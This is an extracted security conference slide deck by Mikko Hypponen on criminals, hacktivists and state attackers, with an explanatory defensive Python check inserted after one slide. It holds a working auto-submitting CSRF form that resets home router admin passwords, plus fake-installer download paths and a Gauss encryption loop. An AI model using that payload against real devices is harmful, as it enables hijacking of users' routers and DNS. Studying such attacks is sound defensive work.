Mikko Hypponen - Behind Enemy Lines
![Page 1: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/1.jpg)
HitbSecConfKL 2012
Mikko Hypponen
CRO
F-Secure twitter.com/mikko
![Page 2: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/2.jpg)
• 11 October, 2012
![Page 3: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/3.jpg)
![Page 4: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/4.jpg)
![Page 5: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/5.jpg)
The Three Main Sources of Cyber Attacks
• Criminals
• Hacktivists
• Governments
![Page 6: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/6.jpg)
Protecting the irreplaceable | f-secure.com
Criminals
![Page 7: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/7.jpg)
Matjaz Skorjanc
![Page 8: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/8.jpg)
![Page 9: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/9.jpg)
![Page 10: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/10.jpg)
![Page 11: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/11.jpg)
![Page 12: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/12.jpg)
![Page 13: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/13.jpg)
![Page 14: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/14.jpg)
![Page 15: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/15.jpg)
"Dedicated servers in data center in Syria for ANY projects"
"Mass domain registration service. Buy 5 – 10 – 15 domains instantly. For malware, traffic and the other things"
![Page 16: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/16.jpg)
![Page 17: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/17.jpg)
![Page 18: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/18.jpg)
map.honeynet.org
![Page 19: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/19.jpg)
Sality
Sipscan
![Page 20: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/20.jpg)
ZeroAccess KML file available from F-Secure Weblog
![Page 21: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/21.jpg)
![Page 22: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/22.jpg)
Case cg4ng3dn5
• 4 million home DSL routers in Brazil
• Huawei, ZyXel, D-Link, Linksys, Netgear…
• Cross-Site Request Forgery (CSRF) performed against the administration panel of the ADSL modem
• Changing the DNS servers to malicious ones
• Some Brazilian ISPs had more than 50% of users affected
![Page 23: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/23.jpg)
```html
<body onLoad=javascript:document.form.submit()>
<form action="http://192.168.1.1/password.cgi"; method="POST" name="form">
<input type="hidden" name="sptPassword" value="cg4ng3dn5">
<input type="hidden" name="usrPassword" value="cg4ng3dn5">
<input type="hidden" name="sysPassword" value="cg4ng3dn5">
</form>
</body>
```
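A server-side check that would reject the auto-submitting form shown above, given as an added example (it is not from the talk or from any router vendor's firmware). The function names, the `csrf_token` field, the `ADMIN_ORIGINS` set and the `attacker.example` origin are assumptions made for illustration; the password field names and the router address are the ones on the slide.

```python
import hmac
from urllib.parse import urlsplit

# Assumption: the only origin the admin UI is served from.
ADMIN_ORIGINS = {"http://192.168.1.1"}

def origin_of(url):
    """Return scheme://host[:port] for a URL, or None if it has neither."""
    parts = urlsplit(url or "")
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme}://{parts.netloc}".lower()

def allow_state_change(method, headers, form, session_token):
    """Return (allowed, reason) for a request to a settings endpoint."""
    if method != "POST":
        return False, "state changes must use POST"
    if not session_token:
        return False, "no authenticated session"
    # Browsers attach Origin to cross-site POSTs; fall back to Referer.
    source = origin_of(headers.get("Origin") or headers.get("Referer"))
    if source not in ADMIN_ORIGINS:
        return False, "request did not originate from the admin UI"
    # Per-session secret that a third-party page cannot read or guess.
    sent = form.get("csrf_token", "")
    if not hmac.compare_digest(sent.encode(), session_token.encode()):
        return False, "missing or wrong CSRF token"
    return True, "ok"

# Constructed sample requests (not captured traffic).
SESSION_TOKEN = "b7e1c0ffee-constructed-token"
FORGED = {  # what the auto-submitting form on the slide would send
    "headers": {"Origin": "http://attacker.example"},
    "form": {"sptPassword": "cg4ng3dn5", "usrPassword": "cg4ng3dn5",
             "sysPassword": "cg4ng3dn5"},
}
LEGIT = {  # the admin UI's own form, carrying the session's token
    "headers": {"Origin": "http://192.168.1.1"},
    "form": {"usrPassword": "new-passphrase", "csrf_token": SESSION_TOKEN},
}

if __name__ == "__main__":
    for name, req in (("forged", FORGED), ("legit", LEGIT)):
        print(name, allow_state_change("POST", req["headers"], req["form"],
                                       SESSION_TOKEN))
```

Either check alone stops the forged request: the origin test rejects it first, and the token test would still reject it if the headers were absent or stripped.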
![Page 24: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/24.jpg)
![Page 25: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/25.jpg)
Image from Securelist.
![Page 26: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/26.jpg)
• google.com/GoogleDefence.exe
• facebook.com/ChromeSetup.exe
• facebook.com/Activex_Components.exe
• msn.com/ChromeSetup.exe
![Page 27: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/27.jpg)
![Page 28: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/28.jpg)
![Page 29: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/29.jpg)
Hacktivists
![Page 30: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/30.jpg)
![Page 31: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/31.jpg)
![Page 32: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/32.jpg)
GeoHot / George Hotz
Comex / Nicholas Allegra
![Page 33: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/33.jpg)
![Page 34: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/34.jpg)
Governmental attacks
![Page 35: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/35.jpg)
![Page 36: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/36.jpg)
![Page 37: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/37.jpg)
![Page 38: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/38.jpg)
![Page 39: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/39.jpg)
Nuclear physics lost its innocence in 1945
![Page 40: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/40.jpg)
6es7-315-2 / 6es7-417
Computer science lost its innocence in 2009
![Page 41: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/41.jpg)
![Page 42: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/42.jpg)
![Page 43: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/43.jpg)
![Page 44: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/44.jpg)
![Page 45: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/45.jpg)
![Page 46: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/46.jpg)
![Page 47: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/47.jpg)
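Gauss encryption

```asm
    mov ecx, (LENGTHOF tToCrypt)-1   ; loop count: length of tToCrypt minus one
    mov edx, OFFSET tToCrypt         ; edx -> source buffer
    mov ebx, OFFSET tEncrypt         ; ebx -> output buffer
L1:
    mov eax, [edx]                   ; load a dword from the source
    xor eax, 0ACDCh                  ; XOR with ACDCh (MASM hex literals need a leading digit)
    not eax                          ; invert every bit
    mov [ebx], eax                   ; store the dword to the output
    inc edx                          ; pointers advance one byte per pass,
    inc ebx                          ; so successive dword stores overlap
    loop L1
    mov edx, OFFSET tOutEncr
    call WriteString                 ; print tOutEncr
    mov edx, OFFSET tEncrypt
    call WriteString                 ; print tEncrypt
    call Crlf
    ret
```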
![Page 48: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/48.jpg)
![Page 49: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/49.jpg)
![Page 50: Mikko Hypponen - Behind Enemy Lines.pdf](https://reader034.vdocuments.us/reader034/viewer/2022050714/586b76741a28abba488b7e53/html5/thumbnails/50.jpg)